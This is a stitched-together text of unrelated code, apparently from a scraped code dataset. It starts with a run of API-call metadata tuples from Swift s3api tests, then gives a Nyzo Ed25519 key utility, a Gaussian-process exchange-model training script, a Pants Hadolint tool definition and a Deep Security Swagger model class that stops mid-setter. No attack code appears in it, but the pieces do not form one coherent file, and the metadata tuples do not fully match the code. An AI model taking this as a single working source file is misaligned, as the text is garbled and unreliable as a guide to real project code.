s3acl\n'), ((41562, 41584), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (41567, 41584), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((41803, 41825), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (41808, 41825), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((42092, 42114), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (42097, 42114), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((42367, 42389), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (42372, 42389), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((42669, 42691), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (42674, 42691), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((42998, 43020), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (43003, 43020), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((43319, 43341), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (43324, 43341), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((43600, 43622), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (43605, 43622), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((43968, 43990), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (43973, 43990), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((45205, 45227), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (45210, 45227), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((45437, 45459), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), 
'(s3acl_only=True)\n', (45442, 45459), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((45742, 45764), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (45747, 45764), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((45983, 46005), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (45988, 46005), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((46219, 46241), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (46224, 46241), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((46469, 46491), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (46474, 46491), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((47243, 47258), 'unittest.main', 'unittest.main', ([], {}), '()\n', (47256, 47258), False, 'import unittest\n'), ((21839, 21853), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (21851, 21853), False, 'from datetime import datetime\n'), ((23225, 23239), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (23237, 23239), False, 'from datetime import datetime\n'), ((25924, 26016), 'swift.common.swob.Request.blank', 'Request.blank', (['"""/bucket/object"""'], {'environ': "{'REQUEST_METHOD': 'PUT'}", 'headers': 'put_headers'}), "('/bucket/object', environ={'REQUEST_METHOD': 'PUT'}, headers=\n put_headers)\n", (25937, 26016), False, 'from swift.common.swob import Request\n'), ((26088, 26102), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (26100, 26102), False, 'from datetime import datetime\n'), ((27897, 27922), 'swift.common.middleware.s3api.etree.fromstring', 'fromstring', (['body', '"""Error"""'], {}), "(body, 'Error')\n", (27907, 27922), False, 'from swift.common.middleware.s3api.etree import fromstring\n'), ((28610, 28635), 'swift.common.middleware.s3api.etree.fromstring', 'fromstring', (['body', '"""Error"""'], {}), "(body, 'Error')\n", (28620, 28635), False, 'from swift.common.middleware.s3api.etree import fromstring\n'), ((29172, 29191), 'swift.common.middleware.s3api.utils.mktime', 'mktime', (['date_header'], {}), '(date_header)\n', (29178, 29191), False, 'from swift.common.middleware.s3api.utils import mktime, S3Timestamp\n'), ((29654, 29690), 'swift.common.middleware.s3api.etree.fromstring', 'fromstring', (['body', '"""CopyObjectResult"""'], {}), "(body, 'CopyObjectResult')\n", (29664, 29690), False, 'from swift.common.middleware.s3api.etree import fromstring\n'), ((46926, 46950), 'os.environ.get', 'os.environ.get', (['"""TZ"""', '""""""'], {}), "('TZ', '')\n", (46940, 46950), False, 'import os\n'), ((47013, 47025), 'time.tzset', 'time.tzset', ([], {}), '()\n', (47023, 47025), False, 'import time\n'), ((47198, 47210), 'time.tzset', 'time.tzset', ([], {}), '()\n', (47208, 47210), False, 'import time\n'), ((26176, 26187), 'time.time', 'time.time', ([], {}), '()\n', (26185, 26187), False, 'import time\n'), ((26201, 26279), 'mock.patch', 'patch', (['"""swift.common.middleware.s3api.utils.time.time"""'], {'return_value': 'timestamp'}), "('swift.common.middleware.s3api.utils.time.time', return_value=timestamp)\n", (26206, 26279), False, 'from mock import patch\n'), ((26497, 26516), 'swift.common.middleware.s3api.utils.mktime', 'mktime', 
(['date_header'], {}), '(date_header)\n', (26503, 26516), False, 'from swift.common.middleware.s3api.utils import mktime, S3Timestamp\n'), ((27041, 27077), 'swift.common.middleware.s3api.etree.fromstring', 'fromstring', (['body', '"""CopyObjectResult"""'], {}), "(body, 'CopyObjectResult')\n", (27051, 27077), False, 'from swift.common.middleware.s3api.etree import fromstring\n'), ((29216, 29238), 'swift.common.middleware.s3api.utils.S3Timestamp', 'S3Timestamp', (['timestamp'], {}), '(timestamp)\n', (29227, 29238), False, 'from swift.common.middleware.s3api.utils import mktime, S3Timestamp\n'), ((36662, 36763), 'mock.patch', 'patch', (['"""swift.common.middleware.s3api.s3request.get_container_info"""'], {'return_value': "{'status': 204}"}), "('swift.common.middleware.s3api.s3request.get_container_info',\n return_value={'status': 204})\n", (36667, 36763), False, 'from mock import patch\n'), ((36989, 37090), 'mock.patch', 'patch', (['"""swift.common.middleware.s3api.s3request.get_container_info"""'], {'return_value': "{'status': 404}"}), "('swift.common.middleware.s3api.s3request.get_container_info',\n return_value={'status': 404})\n", (36994, 37090), False, 'from mock import patch\n'), ((1894, 1923), 'hashlib.md5', 'hashlib.md5', (['self.object_body'], {}), '(self.object_body)\n', (1905, 1923), False, 'import hashlib\n'), ((24535, 24548), 'swift.common.middleware.s3api.subresource.User', 'User', (['account'], {}), '(account)\n', (24539, 24548), False, 'from swift.common.middleware.s3api.subresource import ACL, User, encode_acl, Owner, Grant\n'), ((24652, 24675), 'swift.common.middleware.s3api.subresource.Owner', 'Owner', (['account', 'account'], {}), '(account, account)\n', (24657, 24675), False, 'from swift.common.middleware.s3api.subresource import ACL, User, encode_acl, Owner, Grant\n'), ((25164, 25177), 'swift.common.middleware.s3api.subresource.User', 'User', (['account'], {}), '(account)\n', (25168, 25177), False, 'from swift.common.middleware.s3api.subresource import ACL, User, encode_acl, Owner, Grant\n'), ((25281, 25304), 'swift.common.middleware.s3api.subresource.Owner', 'Owner', (['account', 'account'], {}), '(account, account)\n', (25286, 25304), False, 'from swift.common.middleware.s3api.subresource import ACL, User, encode_acl, Owner, Grant\n'), ((26545, 26567), 'swift.common.middleware.s3api.utils.S3Timestamp', 'S3Timestamp', (['timestamp'], {}), '(timestamp)\n', (26556, 26567), False, 'from swift.common.middleware.s3api.utils import mktime, S3Timestamp\n'), ((40715, 40728), 'swift.common.middleware.s3api.subresource.User', 'User', (['account'], {}), '(account)\n', (40719, 40728), False, 'from swift.common.middleware.s3api.subresource import ACL, User, encode_acl, Owner, Grant\n'), ((40826, 40861), 'swift.common.middleware.s3api.subresource.Owner', 'Owner', (['"""test:tester"""', '"""test:tester"""'], {}), "('test:tester', 'test:tester')\n", (40831, 40861), False, 'from swift.common.middleware.s3api.subresource import ACL, User, encode_acl, Owner, Grant\n'), ((44648, 44667), 'swift.common.middleware.s3api.subresource.Owner', 'Owner', (['owner', 'owner'], {}), '(owner, owner)\n', (44653, 44667), False, 'from swift.common.middleware.s3api.subresource import ACL, User, encode_acl, Owner, Grant\n'), ((44479, 44492), 'swift.common.middleware.s3api.subresource.User', 'User', (['account'], {}), '(account)\n', (44483, 44492), False, 'from swift.common.middleware.s3api.subresource import ACL, User, encode_acl, Owner, Grant\n'), ((44555, 44566), 
'swift.common.middleware.s3api.subresource.User', 'User', (['owner'], {}), '(owner)\n', (44559, 44566), False, 'from swift.common.middleware.s3api.subresource import ACL, User, encode_acl, Owner, Grant\n')] |
"""
EdDSA Ed25519 key handling
From
https://github.com/n-y-z-o/nyzoVerifier/blob/b73bc25ba3094abe3470ec070ce306885ad9a18f/src/main/java/co/nyzo/verifier/KeyUtil.java
plus
https://github.com/n-y-z-o/nyzoVerifier/blob/17509f03a7f530c0431ce85377db9b35688c078e/src/main/java/co/nyzo/verifier/util/SignatureUtil.java
"""
# Uses https://github.com/warner/python-ed25519 , c binding, fast
import ed25519
import hashlib
from pynyzo.byteutil import ByteUtil
class KeyUtil:
@staticmethod
def main():
"""Temp test, not to be used"""
signing_key, verifying_key = ed25519.create_keypair()
print("Original private key", ByteUtil.bytes_as_string_with_dashes(signing_key.to_bytes()[:32]))
# signing key has signing + verifying, we keep the first 32 to only get the private part.
print("Original public key", ByteUtil.bytes_as_string_with_dashes(verifying_key.to_bytes()))
@staticmethod
def generateSeed(hashable_keyword: str='') -> bytes:
"""Generate a private key, with optional keyword to get reproducible tests results or later HD Wallet."""
if len(hashable_keyword):
            # sha256 requires bytes, so encode the keyword before hashing it into a seed.
            seed = hashlib.sha256(hashable_keyword.encode('utf-8')).digest()
signing_key = ed25519.SigningKey(seed)
else:
signing_key, _ = ed25519.create_keypair()
return signing_key.to_bytes()[:32]
@staticmethod
def private_to_public(private: str) -> str:
"""Temp Test"""
keydata = bytes.fromhex(private)
signing_key = ed25519.SigningKey(keydata)
verifying_key = signing_key.get_verifying_key()
vkey_hex = verifying_key.to_ascii(encoding="hex")
return vkey_hex.decode('utf-8')
@staticmethod
def get_from_private_seed_file(filename: str):
"""returns priv and pub key - as object - from the stored nyzo text id format"""
with open(filename) as f:
nyzo = f.read(80).replace('-', '').encode('utf-8').strip()
signing_key = ed25519.SigningKey(nyzo, encoding="hex")
verifying_key = signing_key.get_verifying_key()
return signing_key, verifying_key
@staticmethod
def get_from_private_seed(seed: str):
"""returns priv and pub key - as object - from an hex seed"""
seed = seed.replace('-', '').encode('utf-8').strip()
signing_key = ed25519.SigningKey(seed, encoding="hex")
verifying_key = signing_key.get_verifying_key()
return signing_key, verifying_key
@staticmethod
def save_to_private_seed_file(filename: str, key: bytes) -> None:
"""Saves the privkey to the nyzo formatted file"""
nyzo_format = ByteUtil.bytes_as_string_with_dashes(key)
with open(filename, 'w') as f:
f.write(nyzo_format)
@staticmethod
def sign_bytes(bytes_to_sign: bytes, private_key: ed25519.SigningKey) -> bytes:
sig = private_key.sign(bytes_to_sign)
return sig
@staticmethod
def signature_is_valid(signature: bytes, signed_bytes: bytes, public_id: bytes) -> bool:
verifying_key = ed25519.VerifyingKey(public_id)
# todo: cache key from id, see https://github.com/n-y-z-o/nyzoVerifier/blob/17509f03a7f530c0431ce85377db9b35688c078e/src/main/java/co/nyzo/verifier/util/SignatureUtil.java
try:
verifying_key.verify(signature, signed_bytes)
# print("signature is good")
return True
except ed25519.BadSignatureError:
# print("signature is bad!")
return False
if __name__ == "__main__":
KeyUtil.main()
# KeyUtil.private_to_public('nyzo-formatted-private-key'.replace('-', ''))
| [
"pynyzo.byteutil.ByteUtil.bytes_as_string_with_dashes",
"hashlib.sha256",
"ed25519.SigningKey",
"ed25519.create_keypair",
"ed25519.VerifyingKey"
]
| [((582, 606), 'ed25519.create_keypair', 'ed25519.create_keypair', ([], {}), '()\n', (604, 606), False, 'import ed25519\n'), ((1512, 1539), 'ed25519.SigningKey', 'ed25519.SigningKey', (['keydata'], {}), '(keydata)\n', (1530, 1539), False, 'import ed25519\n'), ((2341, 2381), 'ed25519.SigningKey', 'ed25519.SigningKey', (['seed'], {'encoding': '"""hex"""'}), "(seed, encoding='hex')\n", (2359, 2381), False, 'import ed25519\n'), ((2651, 2692), 'pynyzo.byteutil.ByteUtil.bytes_as_string_with_dashes', 'ByteUtil.bytes_as_string_with_dashes', (['key'], {}), '(key)\n', (2687, 2692), False, 'from pynyzo.byteutil import ByteUtil\n'), ((3069, 3100), 'ed25519.VerifyingKey', 'ed25519.VerifyingKey', (['public_id'], {}), '(public_id)\n', (3089, 3100), False, 'import ed25519\n'), ((1222, 1246), 'ed25519.SigningKey', 'ed25519.SigningKey', (['seed'], {}), '(seed)\n', (1240, 1246), False, 'import ed25519\n'), ((1290, 1314), 'ed25519.create_keypair', 'ed25519.create_keypair', ([], {}), '()\n', (1312, 1314), False, 'import ed25519\n'), ((1984, 2024), 'ed25519.SigningKey', 'ed25519.SigningKey', (['nyzo'], {'encoding': '"""hex"""'}), "(nyzo, encoding='hex')\n", (2002, 2024), False, 'import ed25519\n'), ((1154, 1186), 'hashlib.sha256', 'hashlib.sha256', (['hashable_keyword'], {}), '(hashable_keyword)\n', (1168, 1186), False, 'import hashlib\n')] |
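A minimal usage sketch for the KeyUtil class above (illustrative only, not part of the pynyzo source); it assumes the module is importable and exercises only the methods defined there.
# Illustrative sketch, not part of pynyzo: a sign/verify round trip with KeyUtil.
seed_bytes = KeyUtil.generateSeed()                       # 32-byte private seed
signing_key, verifying_key = KeyUtil.get_from_private_seed(seed_bytes.hex())
message = b'nyzo test message'
signature = KeyUtil.sign_bytes(message, signing_key)
assert KeyUtil.signature_is_valid(signature, message, verifying_key.to_bytes())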
from argparse import ArgumentParser
import os
import numpy as np
from joblib import dump
from mldftdat.workflow_utils import SAVE_ROOT
from mldftdat.models.gp import *
from mldftdat.data import load_descriptors, filter_descriptors
import yaml
def parse_settings(args):
fname = args.datasets_list[0]
if args.suffix is not None:
fname = fname + '_' + args.suffix
fname = os.path.join(SAVE_ROOT, 'DATASETS', args.functional,
args.basis, args.version, fname)
print(fname)
with open(os.path.join(fname, 'settings.yaml'), 'r') as f:
d = yaml.load(f, Loader=yaml.Loader)
args.gg_a0 = d.get('a0')
args.gg_amin = d.get('amin')
args.gg_facmul = d.get('fac_mul')
def parse_dataset(args, i, val=False):
if val:
fname = args.validation_set[2*i]
n = int(args.validation_set[2*i+1])
else:
fname = args.datasets_list[2*i]
n = int(args.datasets_list[2*i+1])
if args.suffix is not None:
fname = fname + '_' + args.suffix
fname = os.path.join(SAVE_ROOT, 'DATASETS', args.functional,
args.basis, args.version, fname)
print(fname)
X, y, rho_data = load_descriptors(fname)
if val:
# offset in case repeat datasets are used
X, y, rho_data = X[n//2+1:,:], y[n//2+1:], rho_data[:,n//2+1:]
X, y, rho, rho_data = filter_descriptors(X, y, rho_data,
tol=args.density_cutoff)
print(X.shape, n)
if args.randomize:
inds = np.arange(X.shape[0])
np.random.shuffle(inds)
X = X[inds,:]
y = y[inds]
rho = rho[inds]
rho_data = rho_data[:,inds]
return X[::n,:], y[::n], rho[::n], rho_data[:,::n]
def parse_list(lststr, T=int):
return [T(substr) for substr in lststr.split(',')]
def main():
parser = ArgumentParser(description='Trains a GP exchange model')
parser.add_argument('save_file', type=str)
parser.add_argument('feature_file', type=str,
help='serialized FeatureList object in yaml format')
parser.add_argument('datasets_list', nargs='+',
help='pairs of dataset names and inverse sampling densities')
parser.add_argument('basis', metavar='basis', type=str,
help='basis set code')
parser.add_argument('--functional', metavar='functional', type=str, default=None,
help='exchange-correlation functional, HF for Hartree-Fock')
parser.add_argument('-r', '--randomize', action='store_true')
parser.add_argument('-c', '--density-cutoff', type=float, default=1e-4)
#parser.add_argument('-m', '--model-class', type=str, default=None)
#parser.add_argument('-k', '--kernel', help='kernel initialization strategy', type=str, default=None)
parser.add_argument('-s', '--seed', help='random seed', default=0, type=int)
parser.add_argument('-vs', '--validation-set', nargs='+')
parser.add_argument('-d', '--delete-k', action='store_true',
                        help='Delete L (where LL^T = K, the kernel matrix) to save disk space. The model must be refit after reloading to compute covariances.')
parser.add_argument('--heg', action='store_true', help='HEG exact constraint')
parser.add_argument('--tail', action='store_true', help='atomic tail exact constraint')
parser.add_argument('-o', '--desc-order', default=None,
help='comma-separated list of descriptor order with no spaces. must start with 0,1.')
parser.add_argument('-l', '--length-scale', default=None,
                        help='comma-separated list of initial length-scale guesses')
parser.add_argument('--length-scale-mul', type=float, default=1.0,
help='Used for automatic length-scale initial guess')
parser.add_argument('-a', '--agpr', action='store_true',
help='Whether to use Additive RBF. If False, use RBF')
parser.add_argument('-as', '--agpr-scale', default=None)
parser.add_argument('-ao', '--agpr-order', default=2, type=int)
parser.add_argument('-an', '--agpr-nsingle', default=1, type=int)
parser.add_argument('-x', '--xed-y-code', default='CHACHIYO', type=str)
parser.add_argument('-on', '--optimize-noise', action='store_true',
                        help='Whether to optimize the exponent of the density noise.')
parser.add_argument('-v', '--version', default='c', type=str,
help='version of descriptor set. Default c')
parser.add_argument('--suffix', default=None, type=str,
help='customize data directories with this suffix')
args = parser.parse_args()
parse_settings(args)
np.random.seed(args.seed)
feature_list = FeatureList.load(args.feature_file)
if args.length_scale is not None:
args.length_scale = parse_list(args.length_scale, T=float)
if args.agpr_scale is not None:
args.agpr_scale = parse_list(args.agpr_scale, T=float)
if args.desc_order is not None:
args.desc_order = parse_list(args.desc_order)
assert len(args.datasets_list) % 2 == 0, 'Need pairs of entries for datasets list.'
assert len(args.datasets_list) != 0, 'Need training data'
nd = len(args.datasets_list) // 2
if args.validation_set is None:
nv = 0
else:
assert len(args.validation_set) % 2 == 0, 'Need pairs of entries for datasets list.'
nv = len(args.validation_set) // 2
X, y, rho, rho_data = parse_dataset(args, 0)
for i in range(1, nd):
        Xn, yn, rhon, rho_datan = parse_dataset(args, i)
X = np.append(X, Xn, axis=0)
y = np.append(y, yn, axis=0)
rho = np.append(rho, rhon, axis=0)
rho_data = np.append(rho_data, rho_datan, axis=1)
if nv != 0:
Xv, yv, rhov, rho_datav = parse_dataset(args, 0, val=True)
for i in range(1, nv):
            Xn, yn, rhon, rho_datan = parse_dataset(args, i, val=True)
Xv = np.append(Xv, Xn, axis=0)
yv = np.append(yv, yn, axis=0)
rhov = np.append(rhov, rhon, axis=0)
rho_datav = np.append(rho_datav, rho_datan, axis=1)
gpcls = DFTGPR
gpr = gpcls.from_settings(X, feature_list, args)
gpr.fit(X, y, add_heg=args.heg, add_tail=args.tail)
#if args.heg:
# gpr.add_heg_limit()
print('FINAL KERNEL', gpr.gp.kernel_)
if nv != 0:
pred = gpr.xed_to_y(gpr.predict(Xv), Xv)
abserr = np.abs(pred - gpr.xed_to_y(yv, Xv))
print('MAE VAL SET', np.mean(abserr))
# Always attach the arguments to the object to keep track of settings.
gpr.args = args
if args.delete_k:
gpr.L_ = None
dump(gpr, args.save_file)
if __name__ == '__main__':
main()
| [
"numpy.mean",
"argparse.ArgumentParser",
"os.path.join",
"yaml.load",
"numpy.append",
"mldftdat.data.load_descriptors",
"mldftdat.data.filter_descriptors",
"numpy.random.seed",
"joblib.dump",
"numpy.arange",
"numpy.random.shuffle"
]
| [((390, 480), 'os.path.join', 'os.path.join', (['SAVE_ROOT', '"""DATASETS"""', 'args.functional', 'args.basis', 'args.version', 'fname'], {}), "(SAVE_ROOT, 'DATASETS', args.functional, args.basis, args.\n version, fname)\n", (402, 480), False, 'import os\n'), ((1042, 1132), 'os.path.join', 'os.path.join', (['SAVE_ROOT', '"""DATASETS"""', 'args.functional', 'args.basis', 'args.version', 'fname'], {}), "(SAVE_ROOT, 'DATASETS', args.functional, args.basis, args.\n version, fname)\n", (1054, 1132), False, 'import os\n'), ((1191, 1214), 'mldftdat.data.load_descriptors', 'load_descriptors', (['fname'], {}), '(fname)\n', (1207, 1214), False, 'from mldftdat.data import load_descriptors, filter_descriptors\n'), ((1374, 1433), 'mldftdat.data.filter_descriptors', 'filter_descriptors', (['X', 'y', 'rho_data'], {'tol': 'args.density_cutoff'}), '(X, y, rho_data, tol=args.density_cutoff)\n', (1392, 1433), False, 'from mldftdat.data import load_descriptors, filter_descriptors\n'), ((1863, 1919), 'argparse.ArgumentParser', 'ArgumentParser', ([], {'description': '"""Trains a GP exchange model"""'}), "(description='Trains a GP exchange model')\n", (1877, 1919), False, 'from argparse import ArgumentParser\n'), ((4702, 4727), 'numpy.random.seed', 'np.random.seed', (['args.seed'], {}), '(args.seed)\n', (4716, 4727), True, 'import numpy as np\n'), ((6664, 6689), 'joblib.dump', 'dump', (['gpr', 'args.save_file'], {}), '(gpr, args.save_file)\n', (6668, 6689), False, 'from joblib import dump\n'), ((593, 625), 'yaml.load', 'yaml.load', (['f'], {'Loader': 'yaml.Loader'}), '(f, Loader=yaml.Loader)\n', (602, 625), False, 'import yaml\n'), ((1539, 1560), 'numpy.arange', 'np.arange', (['X.shape[0]'], {}), '(X.shape[0])\n', (1548, 1560), True, 'import numpy as np\n'), ((1569, 1592), 'numpy.random.shuffle', 'np.random.shuffle', (['inds'], {}), '(inds)\n', (1586, 1592), True, 'import numpy as np\n'), ((5613, 5637), 'numpy.append', 'np.append', (['X', 'Xn'], {'axis': '(0)'}), '(X, Xn, axis=0)\n', (5622, 5637), True, 'import numpy as np\n'), ((5650, 5674), 'numpy.append', 'np.append', (['y', 'yn'], {'axis': '(0)'}), '(y, yn, axis=0)\n', (5659, 5674), True, 'import numpy as np\n'), ((5689, 5717), 'numpy.append', 'np.append', (['rho', 'rhon'], {'axis': '(0)'}), '(rho, rhon, axis=0)\n', (5698, 5717), True, 'import numpy as np\n'), ((5737, 5775), 'numpy.append', 'np.append', (['rho_data', 'rho_datan'], {'axis': '(1)'}), '(rho_data, rho_datan, axis=1)\n', (5746, 5775), True, 'import numpy as np\n'), ((5967, 5992), 'numpy.append', 'np.append', (['Xv', 'Xn'], {'axis': '(0)'}), '(Xv, Xn, axis=0)\n', (5976, 5992), True, 'import numpy as np\n'), ((6006, 6031), 'numpy.append', 'np.append', (['yv', 'yn'], {'axis': '(0)'}), '(yv, yn, axis=0)\n', (6015, 6031), True, 'import numpy as np\n'), ((6047, 6076), 'numpy.append', 'np.append', (['rhov', 'rhon'], {'axis': '(0)'}), '(rhov, rhon, axis=0)\n', (6056, 6076), True, 'import numpy as np\n'), ((6097, 6136), 'numpy.append', 'np.append', (['rho_datav', 'rho_datan'], {'axis': '(1)'}), '(rho_datav, rho_datan, axis=1)\n', (6106, 6136), True, 'import numpy as np\n'), ((532, 568), 'os.path.join', 'os.path.join', (['fname', '"""settings.yaml"""'], {}), "(fname, 'settings.yaml')\n", (544, 568), False, 'import os\n'), ((6503, 6518), 'numpy.mean', 'np.mean', (['abserr'], {}), '(abserr)\n', (6510, 6518), True, 'import numpy as np\n')] |
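A small illustrative sketch of the argument conventions used by the training script above (the dataset names here are hypothetical): positional datasets come as (name, inverse-sampling-density) pairs, and parse_list turns comma-separated option strings into typed lists.
# Illustrative only; 'setA'/'setB' are made-up dataset names.
datasets_list = ['setA', '50', 'setB', '100']
pairs = [(datasets_list[2 * i], int(datasets_list[2 * i + 1]))
         for i in range(len(datasets_list) // 2)]    # [('setA', 50), ('setB', 100)]
# Each dataset is then downsampled as X[::n], y[::n] inside parse_dataset.
length_scales = parse_list('0.5,1.0,2.0', T=float)        # [0.5, 1.0, 2.0]
desc_order = parse_list('0,1,4,2')                        # [0, 1, 4, 2]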
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from typing import cast
from pants.core.util_rules.config_files import ConfigFilesRequest
from pants.core.util_rules.external_tool import TemplatedExternalTool
from pants.option.custom_types import file_option, shell_str
class Hadolint(TemplatedExternalTool):
options_scope = "hadolint"
name = "hadolint"
help = "A linter for Dockerfiles."
default_version = "v2.8.0"
# TODO: https://github.com/hadolint/hadolint/issues/411 tracks building and releasing
# hadolint for Linux ARM64.
default_known_versions = [
"v2.8.0|macos_x86_64|27985f257a216ecab06a16e643e8cb0123e7145b5d526cfcb4ce7a31fe99f357|2428944",
"v2.8.0|macos_arm64 |27985f257a216ecab06a16e643e8cb0123e7145b5d526cfcb4ce7a31fe99f357|2428944", # same as mac x86
"v2.8.0|linux_x86_64|9dfc155139a1e1e9b3b28f3de9907736b9dfe7cead1c3a0ae7ff0158f3191674|5895708",
]
default_url_template = (
"https://github.com/hadolint/hadolint/releases/download/{version}/hadolint-{platform}"
)
default_url_platform_mapping = {
"macos_arm64": "Darwin-x86_64",
"macos_x86_64": "Darwin-x86_64",
"linux_x86_64": "Linux-x86_64",
}
@classmethod
def register_options(cls, register):
super().register_options(register)
register(
"--skip",
type=bool,
default=False,
help="Don't use Hadolint when running `./pants lint`.",
)
register(
"--args",
type=list,
member_type=shell_str,
help=(
"Arguments to pass directly to Hadolint, e.g. `--hadolint-args='--format json'`.'"
),
)
register(
"--config",
type=file_option,
default=None,
advanced=True,
help=(
"Path to an YAML config file understood by Hadolint "
"(https://github.com/hadolint/hadolint#configure).\n\n"
f"Setting this option will disable `[{cls.options_scope}].config_discovery`. Use "
"this option if the config is located in a non-standard location."
),
)
register(
"--config-discovery",
type=bool,
default=True,
advanced=True,
help=(
"If true, Pants will include all relevant config files during runs "
"(`.hadolint.yaml` and `.hadolint.yml`).\n\n"
f"Use `[{cls.options_scope}].config` instead if your config is in a "
"non-standard location."
),
)
@property
def skip(self) -> bool:
return cast(bool, self.options.skip)
@property
def args(self) -> tuple[str, ...]:
return tuple(self.options.args)
@property
def config(self) -> str | None:
return cast("str | None", self.options.config)
def config_request(self) -> ConfigFilesRequest:
# Refer to https://github.com/hadolint/hadolint#configure for how config files are
# discovered.
return ConfigFilesRequest(
specified=self.config,
specified_option_name=f"[{self.options_scope}].config",
discovery=cast(bool, self.options.config_discovery),
check_existence=[".hadolint.yaml", ".hadolint.yml"],
)
| [
"typing.cast"
]
| [((2848, 2877), 'typing.cast', 'cast', (['bool', 'self.options.skip'], {}), '(bool, self.options.skip)\n', (2852, 2877), False, 'from typing import cast\n'), ((3038, 3077), 'typing.cast', 'cast', (['"""str | None"""', 'self.options.config'], {}), "('str | None', self.options.config)\n", (3042, 3077), False, 'from typing import cast\n'), ((3404, 3445), 'typing.cast', 'cast', (['bool', 'self.options.config_discovery'], {}), '(bool, self.options.config_discovery)\n', (3408, 3445), False, 'from typing import cast\n')] |
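For illustration, this is how the templated download URL above resolves for one platform, using the class defaults; the plain str.format expansion is a sketch, not necessarily how Pants substitutes it internally.
# Illustrative expansion of default_url_template using the defaults defined above.
version = "v2.8.0"
platform = Hadolint.default_url_platform_mapping["linux_x86_64"]   # 'Linux-x86_64'
url = Hadolint.default_url_template.format(version=version, platform=platform)
# -> https://github.com/hadolint/hadolint/releases/download/v2.8.0/hadolint-Linux-x86_64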
# coding: utf-8
"""
Trend Micro Deep Security API
Copyright 2018 - 2020 Trend Micro Incorporated.<br/>Get protected, stay secured, and keep informed with Trend Micro Deep Security's new RESTful API. Access system data and manage security configurations to automate your security workflows and integrate Deep Security into your CI/CD pipeline. # noqa: E501
OpenAPI spec version: 12.5.841
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class ApplicationTypeRights(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'can_create_new_application_types': 'bool',
'can_delete_application_types': 'bool',
'can_edit_application_type_properties': 'bool'
}
attribute_map = {
'can_create_new_application_types': 'canCreateNewApplicationTypes',
'can_delete_application_types': 'canDeleteApplicationTypes',
'can_edit_application_type_properties': 'canEditApplicationTypeProperties'
}
def __init__(self, can_create_new_application_types=None, can_delete_application_types=None, can_edit_application_type_properties=None): # noqa: E501
"""ApplicationTypeRights - a model defined in Swagger""" # noqa: E501
self._can_create_new_application_types = None
self._can_delete_application_types = None
self._can_edit_application_type_properties = None
self.discriminator = None
if can_create_new_application_types is not None:
self.can_create_new_application_types = can_create_new_application_types
if can_delete_application_types is not None:
self.can_delete_application_types = can_delete_application_types
if can_edit_application_type_properties is not None:
self.can_edit_application_type_properties = can_edit_application_type_properties
@property
def can_create_new_application_types(self):
"""Gets the can_create_new_application_types of this ApplicationTypeRights. # noqa: E501
Right to create new application types. # noqa: E501
:return: The can_create_new_application_types of this ApplicationTypeRights. # noqa: E501
:rtype: bool
"""
return self._can_create_new_application_types
@can_create_new_application_types.setter
def can_create_new_application_types(self, can_create_new_application_types):
"""Sets the can_create_new_application_types of this ApplicationTypeRights.
Right to create new application types. # noqa: E501
:param can_create_new_application_types: The can_create_new_application_types of this ApplicationTypeRights. # noqa: E501
:type: bool
"""
